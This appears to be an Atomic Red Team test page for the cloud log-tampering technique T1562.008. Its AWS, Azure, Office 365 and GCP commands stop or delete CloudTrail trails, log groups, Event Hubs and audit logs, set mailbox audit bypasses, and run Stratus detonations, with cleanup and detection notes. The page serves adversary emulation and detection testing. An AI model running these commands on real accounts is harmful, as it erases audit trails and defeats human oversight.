# T1562.008 - Disable or Modify Cloud Logs
An adversary may disable or modify cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection. Cloud environments allow for collection and analysis of audit and application logs that provide insight into what activities a user does within the environment. If an adversary has sufficient permissions, they can disable or modify logging to avoid detection of their activities.

For example, in AWS an adversary may disable CloudWatch/CloudTrail integrations prior to conducting further malicious activity.(Citation: Following the CloudTrail: Generating strong AWS security signals with Sumo Logic) They may alternatively tamper with logging functionality – for example, by removing any associated SNS topics, disabling multi-region logging, or disabling settings that validate and/or encrypt log files.(Citation: AWS Update Trail)(Citation: Pacu Detection Disruption Module) In Office 365, an adversary may disable logging on mail collection activities for specific users by using the `Set-MailboxAuditBypassAssociation` cmdlet, by disabling M365 Advanced Auditing for the user, or by downgrading the user’s license from an Enterprise E5 to an Enterprise E3 license.(Citation: Dark Reading Microsoft 365 Attacks 2021)

## Atomic Tests

### Atomic Test #1 - AWS - CloudTrail Changes
Creates a new cloudTrail in AWS, Upon successful creation it will Update,Stop and Delete the cloudTrail

**Supported Platforms:** iaas:aws

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `sh`!
##### Description: Check if ~/.aws/credentials file has a default stanza is configured

##### Check Prereq Commands:
```sh
cat ~/.aws/credentials | grep "default"

```
##### Get Prereq Commands:
```sh
echo Please install the aws-cli and configure your AWS default profile using: aws configure

```
##### Description: Check if terraform is installed.

##### Check Prereq Commands:
```sh
terraform version

```
##### Get Prereq Commands:
```sh
echo Please install the terraform and configure your aws default profile 

```
##### Description: Check if the dependency resources are already present.

##### Check Prereq Commands:
```sh
if [ -f "$PathToAtomicsFolder/T1562.008/src/T1562.008-1/terraform.tfstate" ]; then exit 0; else exit 1; fi;

```
##### Get Prereq Commands:
```sh
cd "$PathToAtomicsFolder/T1562.008/src/T1562.008-1/"
terraform init
terraform apply -auto-approve

```

In [ ]:
Invoke-AtomicTest T1562.008 -TestNumbers 1 -GetPreReqs

#### Attack Commands: Run with `sh`
```sh
aws cloudtrail update-trail --name redatomictesttrail --s3-bucket-name redatomic-test  --is-multi-region-trail --region us-east-1
aws cloudtrail stop-logging --name redatomictesttrail --region us-east-1
aws cloudtrail delete-trail --name redatomictesttrail --region us-east-1
```

In [ ]:
Invoke-AtomicTest T1562.008 -TestNumbers 1

#### Cleanup: 
```sh
cd "$PathToAtomicsFolder/T1562.008/src/T1562.008-1/"
terraform destroy -auto-approve
```

In [ ]:
Invoke-AtomicTest T1562.008 -TestNumbers 1 -Cleanup

### Atomic Test #2 - Azure - Eventhub Deletion
Identifies an Event Hub deletion in Azure.
An Event Hub is an event processing service that ingests and processes large volumes of events and data.
An adversary may delete an Event Hub in an attempt to evade detection.
https://docs.microsoft.com/en-us/azure/event-hubs/event-hubs-about.

**Supported Platforms:** iaas:azure

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `powershell`!
##### Description: Install-Module -Name Az

##### Check Prereq Commands:
```powershell
try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}

```
##### Get Prereq Commands:
```powershell
Install-Module -Name AzureAD -Force

```
##### Description: Check if terraform is installed.

##### Check Prereq Commands:
```powershell
terraform version

```
##### Get Prereq Commands:
```powershell
echo Please install the terraform.

```
##### Description: Check if the user is logged into Azure.

##### Check Prereq Commands:
```powershell
az account show

```
##### Get Prereq Commands:
```powershell
echo Configure your Azure account using: az login. 

```
##### Description: Create dependency resources using terraform

##### Check Prereq Commands:
```powershell
try {if (Test-Path "$PathToAtomicsFolder/T1562.008/src/T1562.008-2/terraform.tfstate" ){ exit 0 } else {exit 1}} catch {exit 1}

```
##### Get Prereq Commands:
```powershell
cd "$PathToAtomicsFolder/T1562.008/src/T1562.008-2/"
terraform init
terraform apply -auto-approve

```

In [ ]:
Invoke-AtomicTest T1562.008 -TestNumbers 2 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
$secure_pwd = "None" | ConvertTo-SecureString -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "None", $secure_pwd
Connect-AzureAD -Credential $creds
Remove-AzEventHub -ResourceGroupName None -Namespace None -Name test_eventhub
```

In [ ]:
Invoke-AtomicTest T1562.008 -TestNumbers 2

#### Cleanup: 
```powershell
cd "$PathToAtomicsFolder/T1562.008/src/T1562.008-2/"
terraform destroy -auto-approve
```

In [ ]:
Invoke-AtomicTest T1562.008 -TestNumbers 2 -Cleanup

### Atomic Test #3 - Office 365 - Exchange Audit Log Disabled
You can use the Exchange Management Shell to enable or disable mailbox audit logging for a mailbox.
Unified or Admin Audit logs are disabled via the Exchange Powershell cmdline.
https://github.com/Azure/Azure-Sentinel/blob/master/Detections/OfficeActivity/exchange_auditlogdisabled.yaml

**Supported Platforms:** office-365

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `powershell`!
##### Description: ExchangeOnlineManagement PowerShell module must be installed

##### Check Prereq Commands:
```powershell
$RequiredModule = Get-Module -Name ExchangeOnlineManagement -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Connect-ExchangeOnline']) {exit 1} else {exit 0}

```
##### Get Prereq Commands:
```powershell
Install-Module -Name ExchangeOnlineManagement         
Import-Module ExchangeOnlineManagement

```

In [ ]:
Invoke-AtomicTest T1562.008 -TestNumbers 3 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
$secure_pwd = "None" | ConvertTo-SecureString -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "None", $secure_pwd
Connect-ExchangeOnline -Credential $creds
Set-AdminAuditLogConfig -UnifiedAuditLogIngestionEnabled $False
```

In [ ]:
Invoke-AtomicTest T1562.008 -TestNumbers 3

#### Cleanup: 
```powershell
$secure_pwd = "None" | ConvertTo-SecureString -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "None", $secure_pwd
Connect-ExchangeOnline -Credential $creds
Set-AdminAuditLogConfig -UnifiedAuditLogIngestionEnabled $True
```

In [ ]:
Invoke-AtomicTest T1562.008 -TestNumbers 3 -Cleanup

### Atomic Test #4 - AWS - Disable CloudTrail Logging Through Event Selectors using Stratus
Update event selectors in AWS CloudTrail to disable the logging of certain management events to evade defense. This Atomic test leverages a tool called Stratus-Red-Team built by DataDog (https://github.com/DataDog/stratus-red-team). Stratus Red Team is a self-contained binary. You can use it to easily detonate offensive attack techniques against a live cloud environment. Ref: https://stratus-red-team.cloud/attack-techniques/AWS/aws.defense-evasion.cloudtrail-event-selectors/

**Supported Platforms:** linux, macos, iaas:aws

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `sh`!
##### Description: Stratus binary must be present at the (#{stratus_path}/stratus)

##### Check Prereq Commands:
```sh
if [ -f $PathToAtomicsFolder/T1562.008/src/stratus ]; then exit 0; else exit 1; fi;

```
##### Get Prereq Commands:
```sh
if [ "$(uname)" == "Darwin" ]
then DOWNLOAD_URL=$(curl -s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest | grep browser_download_url | grep Darwin_x86_64 | cut -d '"' -f 4); wget -q -O $PathToAtomicsFolder/T1562.008/src/stratus-red-team-latest.tar.gz $DOWNLOAD_URL
  tar -xzvf $PathToAtomicsFolder/T1562.008/src/stratus-red-team-latest.tar.gz --directory $PathToAtomicsFolder/T1562.008/src/
elif [ "$(expr substr $(uname) 1 5)" == "Linux" ]
then DOWNLOAD_URL=$(curl -s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest | grep browser_download_url | grep linux_x86_64 | cut -d '"' -f 4) 
  wget -q -O $PathToAtomicsFolder/T1562.008/src/stratus-red-team-latest.tar.gz $DOWNLOAD_URL
  tar -xzvf $PathToAtomicsFolder/T1562.008/src/stratus-red-team-latest.tar.gz --directory $PathToAtomicsFolder/T1562.008/src/
fi

```
##### Description: Check if ~/.aws/credentials file has a default stanza is configured

##### Check Prereq Commands:
```sh
cat ~/.aws/credentials | grep "default"

```
##### Get Prereq Commands:
```sh
echo Please install the aws-cli and configure your AWS defult profile using: aws configure

```

In [ ]:
Invoke-AtomicTest T1562.008 -TestNumbers 4 -GetPreReqs

#### Attack Commands: Run with `sh`
```sh
export AWS_REGION=us-west-2 
cd $PathToAtomicsFolder/T1562.008/src
echo "starting warmup"
./stratus warmup aws.defense-evasion.cloudtrail-event-selectors
echo "starting detonate"
./stratus detonate aws.defense-evasion.cloudtrail-event-selectors --force
```

In [ ]:
Invoke-AtomicTest T1562.008 -TestNumbers 4

#### Cleanup: 
```sh
export AWS_REGION=us-west-2
echo "Cleanup detonation"
cd $PathToAtomicsFolder/T1562.008/src
./stratus cleanup --all
rm -rf stratus*
```

In [ ]:
Invoke-AtomicTest T1562.008 -TestNumbers 4 -Cleanup

### Atomic Test #5 - AWS - CloudTrail Logs Impairment Through S3 Lifecycle Rule using Stratus
This Atomic test will use the Stratus Red Team will first setup a CloudTrail logging into an S3 bucket and will then make an API call to update the lifecycle rule on that S3 bucket with an expiration date of 1 day. This will essentially delete all the logs after one day. Adversaries often do this actiivity to evade detection. Stratus Red Team is a self-contained binary. You can use it to easily detonate offensive attack techniques against a live cloud environment. ref: https://stratus-red-team.cloud/attack-techniques/AWS/aws.defense-evasion.cloudtrail-lifecycle-rule/

**Supported Platforms:** linux, macos

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `sh`!
##### Description: Stratus binary must be present at the (#{stratus_path}/stratus)

##### Check Prereq Commands:
```sh
if [ -f $PathToAtomicsFolder/T1562.008/src/stratus ]; then exit 0; else exit 1; fi;

```
##### Get Prereq Commands:
```sh
if [ "$(uname)" == "Darwin" ]
then DOWNLOAD_URL=$(curl -s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest | grep browser_download_url | grep Darwin_x86_64 | cut -d '"' -f 4); wget -q -O $PathToAtomicsFolder/T1562.008/src/stratus-red-team-latest.tar.gz $DOWNLOAD_URL
  tar -xzvf $PathToAtomicsFolder/T1562.008/src/stratus-red-team-latest.tar.gz --directory $PathToAtomicsFolder/T1562.008/src/
elif [ "$(expr substr $(uname) 1 5)" == "Linux" ]
then DOWNLOAD_URL=$(curl -s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest | grep browser_download_url | grep linux_x86_64 | cut -d '"' -f 4) 
  wget -q -O $PathToAtomicsFolder/T1562.008/src/stratus-red-team-latest.tar.gz $DOWNLOAD_URL
  tar -xzvf $PathToAtomicsFolder/T1562.008/src/stratus-red-team-latest.tar.gz --directory $PathToAtomicsFolder/T1562.008/src/
fi

```
##### Description: Check if ~/.aws/credentials file has a default stanza is configured

##### Check Prereq Commands:
```sh
cat ~/.aws/credentials | grep "default"

```
##### Get Prereq Commands:
```sh
echo Please install the aws-cli and configure your AWS defult profile using: aws configure

```

In [ ]:
Invoke-AtomicTest T1562.008 -TestNumbers 5 -GetPreReqs

#### Attack Commands: Run with `sh`
```sh
export AWS_REGION=us-west-2 
cd $PathToAtomicsFolder/T1562.008/src
echo "starting warmup"
./stratus warmup aws.defense-evasion.cloudtrail-lifecycle-rule
echo "starting detonate"
./stratus detonate aws.defense-evasion.cloudtrail-lifecycle-rule --force
```

In [ ]:
Invoke-AtomicTest T1562.008 -TestNumbers 5

#### Cleanup: 
```sh
export AWS_REGION=us-west-2
echo "Cleanup detonation"
cd $PathToAtomicsFolder/T1562.008/src
./stratus cleanup --all
rm -rf stratus*
```

In [ ]:
Invoke-AtomicTest T1562.008 -TestNumbers 5 -Cleanup

### Atomic Test #6 - AWS - Remove VPC Flow Logs using Stratus
This Atomic will attempt to remove AWS VPC Flow Logs configuration. Stratus Red Team is a self-contained binary. You can use it to easily detonate offensive attack techniques against a live cloud environment. Ref: https://stratus-red-team.cloud/attack-techniques/AWS/aws.defense-evasion.vpc-remove-flow-logs/

**Supported Platforms:** linux, macos, iaas:aws

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `sh`!
##### Description: Stratus binary must be present at the (#{stratus_path}/stratus)

##### Check Prereq Commands:
```sh
if [ -f $PathToAtomicsFolder/T1562.008/src/stratus ]; then exit 0; else exit 1; fi;

```
##### Get Prereq Commands:
```sh
if [ "$(uname)" == "Darwin" ]
then DOWNLOAD_URL=$(curl -s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest | grep browser_download_url | grep Darwin_x86_64 | cut -d '"' -f 4); wget -q -O $PathToAtomicsFolder/T1562.008/src/stratus-red-team-latest.tar.gz $DOWNLOAD_URL
  tar -xzvf $PathToAtomicsFolder/T1562.008/src/stratus-red-team-latest.tar.gz --directory $PathToAtomicsFolder/T1562.008/src/
elif [ "$(expr substr $(uname) 1 5)" == "Linux" ]
then DOWNLOAD_URL=$(curl -s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest | grep browser_download_url | grep linux_x86_64 | cut -d '"' -f 4) 
  wget -q -O $PathToAtomicsFolder/T1562.008/src/stratus-red-team-latest.tar.gz $DOWNLOAD_URL
  tar -xzvf $PathToAtomicsFolder/T1562.008/src/stratus-red-team-latest.tar.gz --directory $PathToAtomicsFolder/T1562.008/src/
fi

```
##### Description: Check if ~/.aws/credentials file has a default stanza is configured

##### Check Prereq Commands:
```sh
cat ~/.aws/credentials | grep "default"

```
##### Get Prereq Commands:
```sh
echo Please install the aws-cli and configure your AWS defult profile using: aws configure

```

In [ ]:
Invoke-AtomicTest T1562.008 -TestNumbers 6 -GetPreReqs

#### Attack Commands: Run with `sh`
```sh
export AWS_REGION=us-west-2 
cd $PathToAtomicsFolder/T1562.008/src
echo "starting warmup"
./stratus warmup aws.defense-evasion.vpc-remove-flow-logs
echo "starting detonate"
./stratus detonate aws.defense-evasion.vpc-remove-flow-logs --force
```

In [ ]:
Invoke-AtomicTest T1562.008 -TestNumbers 6

#### Cleanup: 
```sh
export AWS_REGION=us-west-2
echo "Cleanup detonation"
cd $PathToAtomicsFolder/T1562.008/src
./stratus cleanup --all
rm -rf stratus*
```

In [ ]:
Invoke-AtomicTest T1562.008 -TestNumbers 6 -Cleanup

### Atomic Test #7 - AWS - CloudWatch Log Group Deletes
Creates a new cloudWatch log group in AWS, Upon successful creation it will Delete the group. Attackers can use this technique to evade defenses by 
deleting the log stream. Once it is deleted, the logs created by the attackers will not be logged. https://www.elastic.co/guide/en/security/current/aws-cloudwatch-log-group-deletion.html#aws-cloudwatch-log-group-deletion

**Supported Platforms:** iaas:aws

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `sh`!
##### Description: Check if ~/.aws/credentials file has a default stanza is configured

##### Check Prereq Commands:
```sh
cat ~/.aws/credentials | grep "default"

```
##### Get Prereq Commands:
```sh
echo Please install the aws-cli and configure your AWS defult profile using: aws configure

```

In [ ]:
Invoke-AtomicTest T1562.008 -TestNumbers 7 -GetPreReqs

#### Attack Commands: Run with `sh`
```sh
aws logs create-log-group --log-group-name log-test --region us-east-1 --output json
echo "*** Log Group Created ***"
aws logs delete-log-group --log-group-name log-test --region us-east-1 --output json
echo "*** Log Group Deleted ***"
```

In [ ]:
Invoke-AtomicTest T1562.008 -TestNumbers 7

### Atomic Test #8 - AWS CloudWatch Log Stream Deletes
Creates a new cloudWatch log stream in AWS, Upon successful creation it will Delete the stream. Attackers can use this technique to evade defenses by 
deleting the log stream. Once it is deleted, the logs created by the attackers will not be logged. https://www.elastic.co/guide/en/security/current/aws-cloudwatch-log-stream-deletion.html

**Supported Platforms:** iaas:aws

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `sh`!
##### Description: Check if ~/.aws/credentials file has a default stanza is configured

##### Check Prereq Commands:
```sh
cat ~/.aws/credentials | grep "default"

```
##### Get Prereq Commands:
```sh
echo Please install the aws-cli and configure your AWS defult profile using: aws configure

```

In [ ]:
Invoke-AtomicTest T1562.008 -TestNumbers 8 -GetPreReqs

#### Attack Commands: Run with `sh`
```sh
aws logs create-log-group --log-group-name test-logs --region us-west-2 --output json
echo "*** Log Group Created ***"
aws logs create-log-stream --log-group-name test-logs --log-stream-name 20150601
echo "*** Log Stream Created ***"
aws logs delete-log-stream --log-group-name test-logs --log-stream-name 20150601
echo "*** Log Stream Deleted ***"
aws logs delete-log-group --log-group-name test-logs --region us-west-2 --output json
echo "*** Log Group Deleted ***"
```

In [ ]:
Invoke-AtomicTest T1562.008 -TestNumbers 8

### Atomic Test #9 - Office 365 - Set Audit Bypass For a Mailbox
Use Exchange Management Shell to Mailbox auditing to bypass. It will prevent any mailbox audit logging entries being generated for the target e-mail box.
https://learn.microsoft.com/en-us/powershell/module/exchange/set-mailboxauditbypassassociation?view=exchange-ps

**Supported Platforms:** office-365

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `powershell`!
##### Description: ExchangeOnlineManagement PowerShell module must be installed

##### Check Prereq Commands:
```powershell
$RequiredModule = Get-Module -Name ExchangeOnlineManagement -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Connect-ExchangeOnline']) {exit 1} else {exit 0}

```
##### Get Prereq Commands:
```powershell
Install-Module -Name ExchangeOnlineManagement         
Import-Module ExchangeOnlineManagement

```

In [ ]:
Invoke-AtomicTest T1562.008 -TestNumbers 9 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
$secure_pwd = "o365_password_test" | ConvertTo-SecureString -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "o365_user_test", $secure_pwd
Connect-ExchangeOnline -Credential $creds
Set-MailboxAuditBypassAssociation -Identity "o365_email_test" -AuditBypassEnabled $true
```

In [ ]:
Invoke-AtomicTest T1562.008 -TestNumbers 9

#### Cleanup: 
```powershell
$secure_pwd = "o365_password_test" | ConvertTo-SecureString -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "o365_user_test", $secure_pwd
Connect-ExchangeOnline -Credential $creds
Set-MailboxAuditBypassAssociation -Identity "o365_email_test" -AuditBypassEnabled $false
Disconnect-ExchangeOnline -Confirm:$false
```

In [ ]:
Invoke-AtomicTest T1562.008 -TestNumbers 9 -Cleanup

### Atomic Test #10 - GCP - Delete Activity Event Log
GCP provides 4 types of Cloud Audit Logs: Admin Activity, Data Access, System Events, and Policy Denied.
An adversary may attempt to delete logs in order to hide their activity. However, Admin Activity, System Events, and Policy Deny events logs cannot be deleted. 

This Atomic attempts to delete the Activity Event log. An event is generated under the method name of `google.logging.v2.LoggingServiceV2.DeleteLog` with a Serverity of `ERROR`.

**Supported Platforms:** iaas:gcp

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `sh`!
##### Description: Requires gcloud

##### Check Prereq Commands:
```sh
if [ -x "$(command -v gcloud)" ]; then exit 0; else exit 1; fi;

```
##### Get Prereq Commands:
```sh
echo "Please Install Google Cloud SDK before running this atomic test : https://cloud.google.com/sdk/docs/install"

```
##### Description: Check if user is logged in 

##### Check Prereq Commands:
```sh
gcloud config get-value account

```
##### Get Prereq Commands:
```sh
gcloud auth login --no-launch-browser

```

In [ ]:
Invoke-AtomicTest T1562.008 -TestNumbers 10 -GetPreReqs

#### Attack Commands: Run with `sh`
```sh
gcloud config set project atomic-project-1
gcloud logging logs delete projects/atomic-project-1/logs/cloudaudit.googleapis.com%2Factivity --quiet
```

In [ ]:
Invoke-AtomicTest T1562.008 -TestNumbers 10

## Detection
Monitor logs for API calls to disable logging. In AWS, monitor for: <code>StopLogging</code> and <code>DeleteTrail</code>.(Citation: Stopping CloudTrail from Sending Events to CloudWatch Logs) In GCP, monitor for: <code>google.logging.v2.ConfigServiceV2.UpdateSink</code>.(Citation: Configuring Data Access audit logs)  In Azure, monitor for <code>az monitor diagnostic-settings delete</code>.(Citation: az monitor diagnostic-settings) Additionally, a sudden loss of a log source may indicate that it has been disabled. 